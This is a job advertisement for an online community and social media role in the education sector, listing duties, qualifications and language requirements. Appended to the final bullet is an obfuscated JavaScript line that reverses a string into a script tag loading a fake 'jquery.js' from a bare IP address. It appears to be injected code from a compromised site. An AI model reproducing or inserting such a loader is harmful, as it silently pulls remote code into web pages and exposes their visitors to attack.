Industry : Education
• Implement the online community strategy with various communication tools such as blog, Facebook, WeChat and other relevant online properties.
• Manage communication activities by responding to questions, messages and comments and collate user feedbacks.
• Maintain social media channels including create and execute communication materials (e.g., blog post, newsletter) and update the website content to raise brand awareness online.
• Attend schedule of industry events, campaign and meet-up to engage with the community.
• Monitor effective benchmarks for measuring the growth of the community using Google Analytics to analyze and report on the effectiveness of new initiatives.
• Candidate must possess a Diploma/ Bachelor Degree/ Master Degree in Mass Communication, Advertising Media, Public Relations, Marketing, Business Admin/ Management or equivalent.
• At least 5 years of working experience in the related field.
• Language(s) required: Chinese, English, Bahasa Malaysia.
• Experience in developing digital/ social media strategies.
• Possess strong interpersonal and communication skills.
• Preferably candidates with strong network/ connections with others in social media.
• Familiar in Search Engine Optimization, Content Development and Project Management.
• Willing to travel. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))